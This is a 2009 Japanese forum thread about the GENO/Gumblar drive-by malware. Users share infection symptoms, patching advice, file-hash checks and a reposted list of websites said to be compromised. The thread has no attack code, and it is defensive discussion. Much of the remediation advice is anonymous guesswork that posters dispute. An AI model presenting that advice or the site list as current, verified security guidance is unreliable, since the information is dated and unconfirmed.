[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 05/09 11:03 / Filesize : 206 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

GENOウイルススレ ★5



1 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:17:02 ]
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

★過去スレ
GENOウイルススレ ★4
pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ ★3
pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ ★2
pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
pc11.2ch.net/test/read.cgi/sec/1239152979/

2 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:17:42 ]
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。

3 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:18:27 ]
以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん:攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】


4 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:19:53 ]
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

5 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:24:44 ]
次スレいらないね

6 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:24:44 ]
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3

7 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:25:50 ]
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認


8 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:27:35 ]
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。

9 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:30:51 ]
初心者や質問がある方は
changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです

10 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:32:21 ]
          /)             
           ///)      
          /,.=゙''"/           
   /     i f ,.r='"-‐'つ____   キャッシュ消しゃーいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /



11 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:34:11 ]
確実な対策が出るまでネットはやめた方がいいってことですか?

12 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:35:43 ]
でもネット繋がないと最新の対策を知れないというジレンマ

13 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:36:50 ]
>こっちは、初心者や質問 お断りのテンプレ専用スレにはできないものか?

14 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:37:32 ]
Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

15 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:38:21 ]
とりあえず対策とりつつ
余計なサイトを見に行かないようにしていればいいじゃないのかえ

16 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:38:38 ]
avastって結構早めに対応してたっぽいね
今のカスペル試し終わったらつかおっかな?
あヴぃら・・・にはがっくりだよ

17 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:39:04 ]
ところで前スレの痛いニュースの俺はどちらのスレも立てていない件について
まあどうでもいいんだけどな

18 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:39:43 ]
人減ってきたけどまた昼になれば増えそうな予感

19 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:39:43 ]
ノートン先生機嫌切れで買おうかと思ってたけどもうアバストでいいわ

20 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:40:28 ]
1〜2スレまでまったりしてたのに
なんで急に加速しだしたんだ?



21 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:40:39 ]
これってサイト持ちじゃなければあんまり関係ないかと思っていたら
クレカ情報も抜かれるの?
>>1だと重大性があんまりわからないね

22 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:41:19 ]
>>21
次のスレにでも危ないってことテンプレに入れよう


23 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:42:38 ]
>>20
隠蔽の成果で順調に感染拡大したんだろ

24 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:43:05 ]
avast
感染サイト開くと警告
そのまま言う事聞けば感染しない

だけどそのサイトよく行ってるから誤検出かと思った
あざといぞこのウィルス


25 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:43:22 ]
>>20
同人板の人達がなだれ込んできたから。

26 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:45:36 ]
つい一昨日くらいまでavastでトロイ警告出してたサイトが今行ったらうんともすんともいわない
管理人対策してないっぽいのにどうしたんだろ

27 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:45:37 ]
VirtualPC + LINUX でネットしてれば大丈夫?

28 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:46:46 ]
>>26
こっちもそういうサイト見つけた
どういうことだろう

29 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:46:48 ]
一度感染したPCは
他人に乗っ取られているのと同じ
WindowsUpdateの変わりにウィルスを
いつでも最新の状態に更新してくれます

30 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:47:08 ]
もう2chしか見ない



31 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 04:47:35 ]
523 :名無しさん@お腹いっぱい。 [↓] :2009/05/16(土) 00:47:48
>>1のサイトがいつなくなるかもわからないので、
現在感染中のサイトを転載しておく

p-frying■com/
www■zengozen■co■jp/
www■beauty-wed■co■jp/
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/

32 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:48:04 ]
>>20
セキュ板的には4月上旬が旬のスレで段々過疎って来てたのが
ついこの間動画サイトSayMove!が感染してから
また人が増えたって感じだな

33 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:48:55 ]
俺はインフルのニュー速+かなんかのスレから着たわ
インフルエンザよりこっちのがよっぽど怖い

34 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:49:16 ]
>>27
VirtualPCってことは、ホストOSはWindowsだよね?



35 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:49:50 ]
こういうのいつまで我慢すればいいんだ

36 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:49:50 ]
GENOの対応の悪さったらないね

37 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:50:37 ]
Flash Playerの最新版をDLしてインスコしようとすると、

「申し訳ありません。googleツールバーをインストールできません。
>再試行 >キャンセル」

って出てきて何度も再試行したり最初からDLしてやり直してもインスコ出来ません。
何が原因でしょうか…


38 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:54:42 ]
\Drivers32
に.acmとか.axで設定されてるファイルがあるんだけど・・・
感染してるのかな

39 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:55:33 ]
>>37
グーグルツールバーなんてでるっけ?

40 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:59:18 ]

  ■GENOウイルス無料配布キャンペーン■

      ★延長のお知らせ★



41 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 04:59:50 ]
426 :【5月16日3時時点での同人サイト感染状況】 [↓] :2009/05/16(土) 03:12:03 ID:NMcHxmSp0
1.エヴァ(小説サーチ)
2.ヘタリア(同人サイト)
3.テニミュ(同人サイト及びファンサイト)
4.戦国BASARA(同人サイト)
5.リボーン(プチオンリーサイト及びファンサイト)
6.おお振り(アンソロサイト)
7.ジョジョの奇妙な冒険(同人サイト)
8.バイオハザード(同人サイト)
9.戦国無双(同人サイト)
10.メガテン(同人サイト)
11.乙女ゲームのVitamin(同人サイト)
12.鋼の錬金術師(同人サイト)
13.ガンダム00(同人サイト)
14.幻想水滸伝(同人サイト)
15.忍たま乱太郎(同人サイト)
16.遙かなる時空の中で(同人サイト)
17.Fate(同人サイト)

42 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:00:16 ]
Adobe Flash Playerのインストール
Adobe Flash Playerのバージョン 10.0.22.87

43 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 05:00:18 ]
今北。 なにこれこわい。
マカーは関係ないの?
俺のHPが感染しないようにするにはどうしたらいいんだ。

44 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:01:16 ]
>>43

495 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 00:33:38
>>491
JavaScriptは動いてもMac上ではexeが勝手に動かないから大丈夫だよ

45 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:03:44 ]
先ほどの>>37ですがすみません、自己解決しました

googleツールバーを最新にしてから改めてFlash Playerをインストールしたところ
正常にインストールされました。

46 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:03:57 ]
急に加速してるからビビったw
そんなに広まってるってことかよ・・
2ちゃんが一番安全だなんてw

47 名前:名無しさん@お腹いっぱい。 mailto:age [2009/05/16(土) 05:04:51 ]
感染後クリーンインストールするとして
WEBに関係ない画像やテキストなどのデータはバックアップとっても大丈夫でしょうか?

48 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 05:06:05 ]
>>41
同人板のスレ見てたら
東方
サンレッド
ブレイブルー
コードギアス

も報告来てたよ

49 名前:43 mailto:sage [2009/05/16(土) 05:06:25 ]
>>44
ありがとう。
それにしても恐ろしいな。友達に言っとかないと…

50 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 05:06:47 ]
感染してた人いないです?
話がききたい



51 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:08:12 ]
>>24
あのさ、avastで開こうとしたら警告出るでしょ?
で、すぐにIE閉じた場合、チェストに移動できる?

俺、ウイルスチェストに移動できなくてエラーになったことあるんだが、
この場合、感染してしまったのかな?

ただ、TempInternetFileの中身を全削除してから、全ドライブを
avastでチェックかけたところ、ウイルスは出なかった
regeditも正常に起動できた

ウイルスに感染したページを開く前に、avastが警告出して
未然防止できたってことで良いのかな?
ただ、何でチェストに移動できなかったのかが謎だけど・・・
すぐにIE閉じたから?

52 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 05:08:19 ]
>>50
前スレ見ろ。

53 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:08:27 ]
>>49
自分もすぐ家族とPCに疎い友達に言ったよ
最初はふーんて感じだったけど
小林製薬の事はなしたら「気をつける」ってさ

54 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:09:00 ]
sqlsodbc
サイズ 49.5 KB (50,727 バイト)
ディスク上のサイズ 52.0 KB (53,248 バイト)

これって( )内の数字が正しいから大丈夫だよね?

55 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:11:13 ]
>>51
自分の場合は「そのまま閉じなさい」みたいに言われたから閉じるボタン押したよ
いつもだったらチェストに移動とか出るけどその時は「閉じる」一択だったわ
多分大丈夫
こちらもウィルスチェックしたけど何も出なかった

56 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:13:01 ]
PC疎い人が「気をつける」って
何を気をつけるんだろうな…
ウィルスに感染してるサイトは特別な状態になってるとか
思ってそうだ

57 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:13:46 ]
>>55
あれ、「チェストに移動する(推奨)」とか出なかった?
通常は、「削除」「チェストに移動」のどっちか選べるよね?

あまりに危険だから、チェストに移動できないタイプだったのかな?


58 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:15:33 ]
>>54
md5で確認したファイルとサイズは同じだね
気になるならmd5見たほうがいいんじゃないかな

59 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:18:08 ]
>>57
うん。普通のタイプのウィルスだったら「チェストに移動」が出るんだけど
今回のは出なかったよ
こういう事あるんだなー

60 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:19:27 ]
>>59
俺の場合、「チェストに移動」って出てきたよ
だけど、クリックしたのに「エラー」になって移動できなかった



61 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:20:44 ]
>>56
まぁウィルスという言葉が片隅にあるのとないのじゃ対策の仕方も変わるしいいんでないの

62 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:22:23 ]
とりあえずはavastさんがどうにかしてくれてるわけね

63 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:22:44 ]
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト?
さっきまで1個のファイル 50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった

64 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:22:47 ]
>>47
断言は出来ない
出来ないけどたぶん大丈夫じゃね?
このウイルスは今のところCドライブのシステム関連を改変するだけっぽいので
それ以外の場所のテキストファイルや画像・動画ファイルとかはたぶん問題ないと思う
たぶんね(責任は持てないけど)

65 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:24:14 ]
>>63
それ開けてる

66 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:24:27 ]
>>63
普通にエクスプローラで見てみれば?

67 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:26:08 ]
今日寝ずにオンラインスキャンしたりブラウザの設定したよ...

68 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:26:44 ]
>>63
キャッシュ削除すればおkってゲロさんが言ってた

69 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:27:59 ]
キャッシュ消してもウィルスが消えるわけじゃないんですよね、社員さん

70 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:28:55 ]
ゲロさんの言うキャッシュ削除は役に立たないってまとめwikiにあったが



71 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:29:16 ]
>>38
そっちのファイルが何かわからないけど
こっちも調べたら.acmや.axがあったわ・・・・
けど、ググてみたら普通にレジストリにあるぽいんだよね・・・・
どうなんだろう

72 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:30:24 ]
>>65>>66
開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・

73 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:33:20 ]
さっきまで女とヤりまくってたんだけど
実はウイルスのことで頭がいっぱいだったんだ。

この外国帰りの女。まさか豚ウイルス持ち帰ってねーだろな。
ってな。

74 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:34:02 ]
>>72
カスペでウィルスチェックしたの?
全部

75 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:34:33 ]
GENOってノートンで[94.247.2.0]-[94.247.3.255]を遮断してれば大丈夫?
その他の対策もやっといた方がいいんでしょうか

76 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:34:51 ]
システムフォルダがWINDOWSじゃないとか
システムドライブがC:じゃないとか

77 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:35:44 ]
>>72
お前はもうアウトだと思ってネット切っとけ…

78 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:38:00 ]
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう

79 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:41:08 ]
vipとかも蔓延してそうだな

80 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:41:47 ]
>>78
まずウィルスチェックしてください
他のウィルス対策ソフトやオンラインスキャンが使えないならパソコン綺麗にしたほうが早いですね



81 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:46:46 ]
Adobe Acrobat Reader自体ダウンロードしてなかったら大丈夫?
それとも対策として入れておいたほうがいい?

82 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:47:33 ]
>>81
使わないなら入れなくていい

83 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:53:43 ]
Java script を切ったり、各種ソフトウェアを
更新していれば、万が一書き換えが起きてるサイトを
踏んでも一応大丈夫だと思ってたんだけど
ここ数日で何か変わったのか?

84 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 05:57:29 ]
>>83
亜種が出てきてるから何を信じればいいのかわからない状態

85 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:00:04 ]
>>3
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】



86 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:00:53 ]
javaスクリプトは切ったんだけど、それでも一応
javaスクリプト最新版にアップデートしておいた方が良い?

87 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:01:58 ]
……「同人サイト」ってなに?
エロサイト?



88 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:03:03 ]
うぁあああああああああああああああああああああああああああああああああああああああああああ


ああああああああああ・・・・・・あああああああああ・・・・・あああああああああああ


ぁぁぁぁぁぁ・・・・・・

89 名前:64 mailto:sage [2009/05/16(土) 06:03:04 ]
まとめwikiのdir C:\WINDOWS\system32\sqlsodbc.chmをコピってエンターだとファイルが表示されませんて出たけど
コピペのdir C:\WINDOWS\system32\sqlsodbc.chmだと1個のファイル 50,727バイトってちゃんと出た。
何が違ったのかよくわからないけど一応報告

90 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:07:01 ]
>>89
正常だけど
心配ならウィルスチェックしてみたらいいじゃないの



91 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:11:49 ]
普通のサイトにトラップだなんて困るわ

92 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:17:46 ]
このスレですら今の状態だからもう感染爆発は止められないな
ほとんどのメーカー製PCやソフトはマニュアルがPDFで
Acrobatが標準プリインストールされてしまっている
購入後アドビまで探しに行って更新するわけがないし
リカバリすればまた古いAcrobatが再インストールされる
自分のPCにAcrobatがあることすら知らないはず

93 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:18:34 ]
…げ、evalあった
放置してる上、趣向が趣向だけに
もう閲覧してる人もいないようなサイトだから
ゆっくり考えてから行動するか…
他のサイトは無事で、最優先でチェックした項目に
感染の形跡無いのは何でだろ、亜種かな

94 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:27:03 ]
>>47
本当に必要なファイルはVirusTotalにかけて、
それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
そしてしばらく凍結。

今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。

>>57
なんかほのぼのしているね。
avast使ってないから、なんとも言えんけど、ローカルじゃなくて、ウェブとの通信で見つけたから、
わざわざローカルに保存してチェストに移動する必要がなかったのでは?
>>75
今、凶悪なのが、そこってだけで、前は違ったみたいよ。 だから十中八九また変わる。

95 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:27:14 ]
まずウイルスチェックしようよ

96 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:28:00 ]
ソロだとMeteorb楽なんだけど
マルチだと火力きついんだよね
∞ないと雷は乙ってるし、氷じゃソロ辛そうだしムズイ

97 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:28:42 ]
おはよおー
前スレ終わるのはえーなw
てきとーに読んでみるか

98 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:28:47 ]
なんという誤爆

99 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:29:09 ]
なんかのRPG?

100 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:30:00 ]
>>97
同人板とやらとこのスレを行き来してる人が多かったから
かなり盛り上がってたみたい



101 名前:94 mailto:sage [2009/05/16(土) 06:32:32 ]
>>86
FlashとかadobeReaderとか
www.java.com/ja/download/installed.jsp
じゃなくて?

全てアンインストールするか最新じゃないと、脆弱性あるままだよ。
つまり、Javaスクリプトを切って、たとえ、このウィルスには大丈夫でも、
他のウィルスがスタンバイしている状態。

102 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:33:06 ]
>>97
スレの勢いスゴすぎだよねw
俺も寝る前新スレとして登録したはずなのに、起きたら旧スレになっててワロタ
でもやっとそれだけの人が集まってきたってことなんだろうけど

103 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:33:32 ]
女性同人はブログで満足せずサイト持ちが多いから影響が大きい

104 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:34:04 ]
2ちゃん慣れしてるとこのウィルス本当に存在してんの?とか思ってしまう
だけど他のサイトに行って確認するのも怖いというチキン

105 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:35:01 ]
>>104
こっちは小林のメールマガジンでこのウィルス知ったクチ
その時期に見てなかったから感染しなかったけどね

106 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:38:25 ]
自分も>>54と同じだ
これって黒…?

107 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:39:32 ]
それだけで決めてしまうのではなくって
オンラインチェックだとかPC挙動の見つつ判断したほうがいい

108 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:40:44 ]
>>106
MD5でも比較した方がいい

109 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:41:20 ]
カスペのオンラインスキャンに拒否られる。
やる気ねーだろ。

110 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:41:59 ]
>>108
ごめん
MD5のやり方がわからん



111 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:42:14 ]
ググれ

112 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:43:36 ]
>>111
ググって変なサイトを見たら、また感染する危険があるだろw
ここで教えろw

113 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:44:20 ]
こういう人は同人のほうのスレ行った方が優しくしてもらえる

114 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:44:45 ]
MP5っと…
なんだ?ヘッケラーアンドコックって。

115 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:45:18 ]
>>110
HashCheckerで探しましょう

116 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:47:24 ]
ja.wikipedia.org/wiki/MD5

MD5(エムディーファイブ、Message Digest Algorithm 5)とは、与えられた入力に対して128ビットのハッシュ値を出力するハッシュ関数である。
1991年に開発されたMD5は、前身であるMD4の安全性を向上させたものである。開発者はMD4と同じく、MIT教授のロナルド・リベスト。
Linuxでは md5sum、FreeBSDでは md5 というコマンドが用意されており、これを用いてメッセージダイジェストを出力することが出来る。
出力されるメッセージダイジェストは、d41d8cd98f00b204e9800998ecf8427e (入力データ長が0バイトの場合)
の様に16進数の数字が並んだテキスト形式で出力され、これをフィンガプリント(指紋)やハッシュ値、あるいは単にMD5値と呼ぶ。
「MD5チェックサム」とも良く言われる。


117 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 06:48:19 ]
MD5は、電子署名を必要とするアプリケーション向けに開発された。RSAで署名を生成する際に、メッセージを直接対象として
署名を生成するのではなく、メッセージのハッシュ値を生成し、ハッシュ値に対して署名を生成する。
ファイルを転送する際にそのファイルが破損していないことを確認するためにも用いられる。配布する側は、
ファイル配布時にそのファイルのMD5ハッシュ値(いわゆるMD5チェックサム)も同時に配布する。受信したユーザは
手元でファイルのMD5値を計算して、配布者の提示したMD5値と一致することを確認すれば良い。このような目的に
CRCを用いることもあるが、CRCは標準が複数存在するため現在ではあまり見られない。
またファイルが改竄されていないことを証明するためにも用いられる。これにより、作成者以外による
